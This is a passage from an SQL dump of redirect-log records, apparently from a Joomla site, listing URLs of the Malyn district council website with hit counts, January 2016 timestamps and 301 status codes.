00:00:00',301),(24097,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1342:2014-06-12-09-42-47&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 18:56:37','0000-00-00 00:00:00',301),(24098,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=710:2012-06-14-15-07-29&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 18:56:40','0000-00-00 00:00:00',301),(24099,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=802:-i-i-i-i-i&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 18:59:46','0000-00-00 00:00:00',301),(24100,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=633:-2015-&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-03 18:59:48','0000-00-00 00:00:00',301),(24101,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=418:2011-09-29-08-40-03&Itemid=72&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 18:59:51','0000-00-00 00:00:00',301),(24102,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=750:2012-09-01-09-40-02&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 18:59:54','0000-00-00 00:00:00',301),(24103,'http://www.malyn-rayrada.org.ua/index.php?catid=2:2010-06-05-12-50-39&id=7:2010-06-05-14-44-23&Itemid=5&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 18:59:58','0000-00-00 00:00:00',301),(24104,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=701:-2011-2017-&Itemid=82&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 19:00:01','0000-00-00 00:00:00',301),(24105,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=968:-2012-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 19:00:03','0000-00-00 00:00:00',301),(24106,'http://www.malyn-rayrada.org.ua/index.php?catid=7&id=9:2010-06-05-15-10-04&Itemid=12&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 19:00:04','0000-00-00 00:00:00',301),(24107,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=192:2010-12-15-13-29-12&Itemid=60&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 19:02:00','0000-00-00 00:00:00',301),(24108,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=739:2012-07-23-12-44-57&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 19:03:25','0000-00-00 00:00:00',301),(24109,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=594:-lr-&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-03 19:03:26','0000-00-00 00:00:00',301),(24110,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=876:2012-12-18-09-32-45&Itemid=85&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 19:03:28','0000-00-00 00:00:00',301),(24111,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=699:-2011-2015-&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 19:03:30','0000-00-00 00:00:00',301),(24112,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=767:2012-10-01-08-20-30&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2016-01-03 19:03:43','0000-00-00 00:00:00',301),(24113,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1049:2013-07-15-05-50-46&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 19:03:45','0000-00-00 00:00:00',301),(24114,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1125:2013-10-31-07-20-16&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 19:03:52','0000-00-00 00:00:00',301),(24115,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=940:2013-02-21-14-02-14&lang=en&option=com_content&view=article','','','',3,0,'2016-01-03 19:03:56','0000-00-00 00:00:00',301),(24116,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=548:-2011-2015-&Itemid=76&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 19:03:57','0000-00-00 00:00:00',301),(24117,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=984:-20-&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 19:04:02','0000-00-00 00:00:00',301),(24118,'http://www.malyn-rayrada.org.ua/index.php?id=42&Itemid=80&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-01-03 19:05:47','0000-00-00 00:00:00',301),(24119,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=690:2012-05-29-18-50-09&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 19:10:47','0000-00-00 00:00:00',301),(24120,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1266:2014-04-03-05-25-14&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 19:10:51','0000-00-00 00:00:00',301),(24121,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=620:2012-03-29-10-03-40&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 19:10:53','0000-00-00 00:00:00',301),(24122,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=692:-2012&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 19:10:54','0000-00-00 00:00:00',301),(24123,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1137:2013-11-15-13-07-04&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 19:10:55','0000-00-00 00:00:00',301),(24124,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=843:-l-r&Itemid=85&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 19:10:56','0000-00-00 00:00:00',301),(24125,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=615:-------26032012495-12&Itemid=77&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 19:10:57','0000-00-00 00:00:00',301),(24126,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1274:----------------l--r&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 19:11:01','0000-00-00 00:00:00',301),(24127,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=742:-14-&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-03 19:11:41','0000-00-00 00:00:00',301),(24128,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=344:2011-06-15-12-25-27&Itemid=68&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 19:11:42','0000-00-00 00:00:00',301),(24129,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=861:------qq&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 19:11:43','0000-00-00 00:00:00',301),(24130,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1193:-2014-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 19:11:44','0000-00-00 00:00:00',301),(24131,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1109:2013-10-18-10-25-30&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2016-01-03 19:11:45','0000-00-00 00:00:00',301),(24132,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1039:-l-r&Itemid=92&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 19:11:46','0000-00-00 00:00:00',301),(24133,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=706:---------qq--2012-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 19:11:47','0000-00-00 00:00:00',301),(24134,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1278:2014-04-11-13-44-30&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 19:11:48','0000-00-00 00:00:00',301),(24135,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=805:2012-10-30-13-35-53&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 19:11:49','0000-00-00 00:00:00',301),(24136,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1024:-l-2011-2014-r-&Itemid=92&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 19:11:54','0000-00-00 00:00:00',301),(24137,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=475:2011-11-22-07-58-34&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-03 19:11:59','0000-00-00 00:00:00',301),(24138,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=547:-l-r-2011-2016-&Itemid=76&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-03 19:12:07','0000-00-00 00:00:00',301),(24139,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=762:-210-&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 19:12:09','0000-00-00 00:00:00',301),(24140,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=940:2013-02-21-14-02-14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 19:12:19','0000-00-00 00:00:00',301),(24141,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=615:-------26032012495-12&Itemid=77&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 19:12:20','0000-00-00 00:00:00',301),(24142,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1147:2013-11-28-09-57-12&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 19:16:42','0000-00-00 00:00:00',301),(24143,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=964:-2013-2017-&Itemid=88&lang=en&option=com_content&view=article','','','',2,0,'2016-01-03 19:16:43','0000-00-00 00:00:00',301),(24144,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1253-pro-rajonnu-kompleksnu-programu-sotsialnoji-pidtrimki-uchasnikiv-antiteroristichnoji-operatsiji-ta-chleniv-jikh-simej-na-2016-2020-roki','','','',1,0,'2016-01-03 20:16:33','0000-00-00 00:00:00',301),(24145,'http://www.malyn-rayrada.org.ua/index.php?catid=57:--15042014-&id=1277:-2014-&Itemid=98&lang=en&option=com_content&view=article','','','',2,0,'2016-01-03 20:26:16','0000-00-00 00:00:00',301),(24146,'http://www.malyn-rayrada.org.ua/index.php?catid=31&id=272:-2010-&Itemid=62&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 20:26:25','0000-00-00 00:00:00',301),(24147,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1084:--qq&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 20:26:26','0000-00-00 00:00:00',301),(24148,'http://www.malyn-rayrada.org.ua/index.php?catid=58&id=1294:-2012-2015-&Itemid=105&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 21:03:32','0000-00-00 00:00:00',301),(24149,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=328:2011-05-20-16-23-02&Itemid=66&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 21:03:34','0000-00-00 00:00:00',301),(24150,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=144:2010-10-19-11-11-28&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',3,0,'2016-01-03 22:13:30','0000-00-00 00:00:00',301),(24151,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-3-3','','','',8,0,'2016-01-03 22:26:52','0000-00-00 00:00:00',301),(24152,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=13&Itemid=33&lang=en','','','',3,0,'2016-01-03 22:27:15','0000-00-00 00:00:00',301),(24153,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1277-pro-ugodu-mizh-zhitomirskoyu-oblasnoyu-radoyu-ta-malinskoyu-rajonnoyu-radoyu','','','',1,0,'2016-01-03 23:11:33','0000-00-00 00:00:00',301),(24154,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=15&id=864:-qq&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-04 01:08:21','0000-00-00 00:00:00',301),(24155,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=3&lang=uk&limitstart=10','','','',1,0,'2016-01-04 12:28:45','0000-00-00 00:00:00',301),(24156,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=58','','','',8,0,'2016-01-04 16:05:16','0000-00-00 00:00:00',301),(24157,'http://www.malyn-rayrada.org.ua/index.php/component/content/category/17-deputatska-storinka/2010-06-05-12-51-34?layout=blog&It=','','','',2,0,'2016-01-04 16:11:48','0000-00-00 00:00:00',301),(24158,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&id=40:--28032012-&lang=ru&layout=blog&option=com_content&view=category','','','',4,0,'2016-01-04 16:31:21','0000-00-00 00:00:00',301),(24159,'http://www.malyn-rayrada.org.ua/index.php?option=com_user&view=register&Itemid=','','','',3,0,'2016-01-04 18:16:15','0000-00-00 00:00:00',301),(24160,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1189:2014-01-28-09-46-45&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2016-01-04 19:31:36','0000-00-00 00:00:00',301),(24161,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=489:2011-12-02-06-51-07&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-04 19:33:06','0000-00-00 00:00:00',301),(24162,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=560:2012-02-02-08-56-53&Itemid=76&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-04 19:33:10','0000-00-00 00:00:00',301),(24163,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=315:2011-05-20-13-07-47&Itemid=66&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-04 19:39:58','0000-00-00 00:00:00',301),(24164,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=969:-2013-&Itemid=85&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-04 19:47:44','0000-00-00 00:00:00',301),(24165,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1084:-qq&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-01-04 19:47:56','0000-00-00 00:00:00',301),(24166,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1259:1&Itemid=17&lang=en&option=com_content&view=article','','','',1,0,'2016-01-04 19:48:04','0000-00-00 00:00:00',301),(24167,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1079:-l-2011-2013-r&Itemid=94&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-04 19:49:08','0000-00-00 00:00:00',301),(24168,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1021:-l-r&Itemid=92&lang=ru&option=com_content&view=article','','','',3,0,'2016-01-04 20:08:46','0000-00-00 00:00:00',301),(24169,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=944:-l-r-&Itemid=88&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-04 20:17:52','0000-00-00 00:00:00',301),(24170,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=742:-14-&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-04 20:17:54','0000-00-00 00:00:00',301),(24171,'http://www.malyn-rayrada.org.ua/index.php?id=42&Itemid=80&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2016-01-04 20:18:33','0000-00-00 00:00:00',301),(24172,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=704:-20-2011-108-l-r-&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2016-01-04 20:34:09','0000-00-00 00:00:00',301),(24173,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1063:2013-08-02-17-32-04&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-04 20:40:11','0000-00-00 00:00:00',301),(24174,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1079:------l---2011-2013-r&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-04 21:01:12','0000-00-00 00:00:00',301),(24175,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=681:16-13-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-04 21:01:29','0000-00-00 00:00:00',301),(24176,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1160-pro-vnesennya-zmin-do-rishennya-rajonnoji-radi-vid-16-11-2010r-5-pro-utvorennya-postijnikh-komisij-rajonnoji-radi-zatverdzhennya-jikh-skladu-ta-obrannya-goliv-komisij','','','',6,0,'2016-01-04 21:29:14','0000-00-00 00:00:00',301),(24177,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=728:2012-06-26-07-51-10&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-04 21:30:17','0000-00-00 00:00:00',301),(24178,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1267:2014-04-03-21-52-50&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-04 21:34:07','0000-00-00 00:00:00',301),(24179,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=981:2013-04-03-07-23-01&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-04 21:34:14','0000-00-00 00:00:00',301),(24180,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=218:2010-12-21-06-45-54&Itemid=16&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-04 21:36:07','0000-00-00 00:00:00',301),(24181,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=718:2012-06-14-15-24-50&catid=43&Itemid=82&lang=uk','','','',6,0,'2016-01-04 21:49:19','0000-00-00 00:00:00',301),(24182,'http://www.malyn-rayrada.org.ua/index.php?id=57&Itemid=98&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-01-04 22:04:50','0000-00-00 00:00:00',301),(24183,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=188:2010-12-15-13-18-12&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2016-01-04 22:12:40','0000-00-00 00:00:00',301),(24184,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=984:-20-&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2016-01-04 22:25:10','0000-00-00 00:00:00',301),(24185,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=794:-lr&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-04 22:25:25','0000-00-00 00:00:00',301),(24186,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=963:2013-03-13-06-16-53&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2016-01-04 22:25:30','0000-00-00 00:00:00',301),(24187,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=766:2012-09-28-08-37-31&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-04 22:40:49','0000-00-00 00:00:00',301),(24188,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=736:2012-07-18-13-34-35&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2016-01-05 00:14:06','0000-00-00 00:00:00',301),(24189,'http://malyn-rayrada.org.ua/index.php/1034-vitaemo-iz-svyatom-vesni?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-05 00:19:43','0000-00-00 00:00:00',301),(24190,'http://malyn-rayrada.org.ua/index.php/1074-do-vidoma-silskikh-ta-selishchnikh-rad-roz-yaznennya-tsvk','','','',17,0,'2016-01-05 00:19:44','0000-00-00 00:00:00',301),(24191,'http://malyn-rayrada.org.ua/index.php/1074-do-vidoma-silskikh-ta-selishchnikh-rad-roz-yaznennya-tsvk?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-05 00:19:46','0000-00-00 00:00:00',301),(24192,'http://malyn-rayrada.org.ua/index.php/1138-vishivska-silska-rada-informue','','','',17,0,'2016-01-05 00:19:50','0000-00-00 00:00:00',301),(24193,'http://malyn-rayrada.org.ua/index.php/1138-vishivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',37,0,'2016-01-05 00:19:52','0000-00-00 00:00:00',301),(24194,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/gamanuk1285265172-thumb-medium150-93','','','',5,0,'2016-01-05 00:19:57','0000-00-00 00:00:00',301),(24195,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-2-12','','','',7,0,'2016-01-05 00:19:59','0000-00-00 00:00:00',301),(24196,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-8-8','','','',5,0,'2016-01-05 00:20:01','0000-00-00 00:00:00',301),(24197,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-9-9','','','',5,0,'2016-01-05 00:20:02','0000-00-00 00:00:00',301),(24198,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/bud22-132','','','',5,0,'2016-01-05 00:20:07','0000-00-00 00:00:00',301),(24199,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-80','','','',5,0,'2016-01-05 00:20:09','0000-00-00 00:00:00',301),(24200,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0920-11-105','','','',5,0,'2016-01-05 00:20:11','0000-00-00 00:00:00',301),(24201,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0972-15-108','','','',5,0,'2016-01-05 00:20:13','0000-00-00 00:00:00',301),(24202,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1111-22-114','','','',5,0,'2016-01-05 00:20:15','0000-00-00 00:00:00',301),(24203,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=ru&start=7','','','',5,0,'2016-01-05 00:20:17','0000-00-00 00:00:00',301),(24204,'http://malyn-rayrada.org.ua/index.php/366-do-vidoma-zhiteliv-mista-ta-rajonu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:20:27','0000-00-00 00:00:00',301),(24205,'http://malyn-rayrada.org.ua/index.php/558-27-sesija-rajonnoi-radi-vidbudetsja-4-ljutogo-2014?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:20:28','0000-00-00 00:00:00',301),(24206,'http://malyn-rayrada.org.ua/index.php/566-pro-sklikannja-27-sesii-malinskoi-rajonnoi-radi','','','',6,0,'2016-01-05 00:20:31','0000-00-00 00:00:00',301),(24207,'http://malyn-rayrada.org.ua/index.php/566-pro-sklikannja-27-sesii-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:20:33','0000-00-00 00:00:00',301),(24208,'http://malyn-rayrada.org.ua/index.php/567-ogoloshennja_4','','','',6,0,'2016-01-05 00:20:34','0000-00-00 00:00:00',301),(24209,'http://malyn-rayrada.org.ua/index.php/568-ogoloshennja_5?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:20:36','0000-00-00 00:00:00',301),(24210,'http://malyn-rayrada.org.ua/index.php/617-shkoli-buti?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:20:38','0000-00-00 00:00:00',301),(24211,'http://malyn-rayrada.org.ua/index.php/652-do-vidoma-deputativ-rajonnoi-radi-z-utochnennjam?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:20:40','0000-00-00 00:00:00',301),(24212,'http://malyn-rayrada.org.ua/index.php/656-pro-vnesennja-zmin-do-rozporjadzhennja-golovi','','','',5,0,'2016-01-05 00:20:42','0000-00-00 00:00:00',301),(24213,'http://malyn-rayrada.org.ua/index.php/656-pro-vnesennja-zmin-do-rozporjadzhennja-golovi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:20:45','0000-00-00 00:00:00',301),(24214,'http://malyn-rayrada.org.ua/index.php/662-ogoloshennja_10?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:20:49','0000-00-00 00:00:00',301),(24215,'http://malyn-rayrada.org.ua/index.php/719-vidminnosti-norm-konstitucij-u-redakcii-1996-i','','','',8,0,'2016-01-05 00:20:51','0000-00-00 00:00:00',301),(24216,'http://malyn-rayrada.org.ua/index.php/719-vidminnosti-norm-konstitucij-u-redakcii-1996-i?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:20:53','0000-00-00 00:00:00',301),(24217,'http://malyn-rayrada.org.ua/index.php/720-do-vidoma-pensioneriv?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:20:57','0000-00-00 00:00:00',301),(24218,'http://malyn-rayrada.org.ua/index.php/721-verhovna-rada-zatverdila-sklad-kabinetu-ministriv?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:21:01','0000-00-00 00:00:00',301),(24219,'http://malyn-rayrada.org.ua/index.php/723-pro-nevidkladni-zahodi-shhodo-zabezpechennja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:21:08','0000-00-00 00:00:00',301),(24220,'http://malyn-rayrada.org.ua/index.php/747-gaz-dlja-naselennja-v-ukraini-z-1-travnja','','','',6,0,'2016-01-05 00:21:16','0000-00-00 00:00:00',301),(24221,'http://malyn-rayrada.org.ua/index.php/747-gaz-dlja-naselennja-v-ukraini-z-1-travnja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:21:19','0000-00-00 00:00:00',301),(24222,'http://malyn-rayrada.org.ua/index.php/760-ogoloshennja_15','','','',5,0,'2016-01-05 00:21:26','0000-00-00 00:00:00',301),(24223,'http://malyn-rayrada.org.ua/index.php/760-ogoloshennja_15?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:21:28','0000-00-00 00:00:00',301),(24224,'http://malyn-rayrada.org.ua/index.php/832-vidbulas-31-sesija-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-05 00:21:39','0000-00-00 00:00:00',301),(24225,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1010-pro-zatverdzhennya-zvitu-pro-vikonannya-rajonnogo-byudzhetu-za-2014-rik?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:21:41','0000-00-00 00:00:00',301),(24226,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1012-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:21:43','0000-00-00 00:00:00',301),(24227,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/924-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-z-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-yaka-peredaetsya-v-orendu-fop-rikhalskij-o-a','','','',5,0,'2016-01-05 00:21:45','0000-00-00 00:00:00',301),(24228,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/925-pro-nadannya-dozvolu-na-vlashtuvannya-rudenko-k-v-do-chopovitskogo-statsionarnogo-viddilennya-postijnogo-prozhivannya-odinokikh-nepratsezdatnikh-gromadyan','','','',5,0,'2016-01-05 00:21:47','0000-00-00 00:00:00',301),(24229,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/927-pro-spisannya-osnovnikh-zasobiv?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:21:52','0000-00-00 00:00:00',301),(24230,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/929-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:21:54','0000-00-00 00:00:00',301),(24231,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/368-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_7','','','',5,0,'2016-01-05 00:22:06','0000-00-00 